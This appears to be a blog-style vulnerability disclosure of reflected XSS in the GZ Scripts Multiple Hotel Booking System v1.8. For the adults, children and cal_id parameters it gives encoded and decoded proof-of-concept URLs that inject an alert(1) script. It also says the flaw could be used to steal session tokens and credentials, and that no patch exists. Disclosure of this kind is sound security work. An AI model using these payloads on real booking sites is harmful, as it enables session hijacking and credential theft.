GZ SCRIPTS MULTIPLE HOTEL BOOKING SYSTEM VULNERABLE TO REFLECTED-XSS

An open-source multiple hotels booking system known as GZ Scripts has been found to be vulnerable to reflected-XSS (Cross-Site Scripting).

GZ-SCRIPTS.png

The system which provides a powerful solution to allow users of the system, in managing their multiple bookings of hotels, was designed to allow two types of access level; The Super Admin, and Hotel Owner (Agent).

admin-panel-GZ-scripts-01.png

Image source: fixitgearware.

The software which is the GZ multiple Hotel Booking system (v1.8), is vulnerable to RXSS. This allows a malicious attacker to manipulate the content of the website.

When a victim is sent a well-crafted malicious link by an attacker, via an email or any messaging platform, the attacker will be able to perform various malicious intents which is stealing the victims’ sessions token, or login credentials (such as usernames and passwords).

The GET ‘adult’ request:

The GET ‘adult’ request which is vulnerable to RXSS (Reflected-Cross-Site-Scripting), shows an attacker encoding a malicious link, which contains the RXSS hidden in it.

The Encoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2

The Decoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17″><script>alert(1)</script>z85vz&children=undefined&cal_id=2

adult-decoded-01.png

The GET ‘children’ request:

The GET ‘children’ request which is vulnerable to RXSS, shows an attacker encoding a malicious link, which contains the RXSS hidden in it.

The Encoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2

The Decoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb”><script>alert(1)</script>cwp1x&cal_id=2

children-decoded-01.png

The GET ‘cal_id’ request:

The GET ‘cal_id’ request which is vulnerable to RXSS, shows an attacker encoding a malicious link, which contains the RXSS hidden in it.

The Encoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm

The Decoded Link:

https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz”><script>alert(1)</script>xqwmm

call_id_vulnerable-01.png

As at the moment this vulnerability was discovered, there hasn’t been any security update or patch, for websites running GZ Scripts on their booking system.

Credits goes to:

Packetstormsecurity

CryptoJob (Twitter)

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09  

 

 

 

Put your comments below in the comment section on your thoughts about this.

Find this article and information helpful? Show some love and support  “Click-Here”
5 1 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments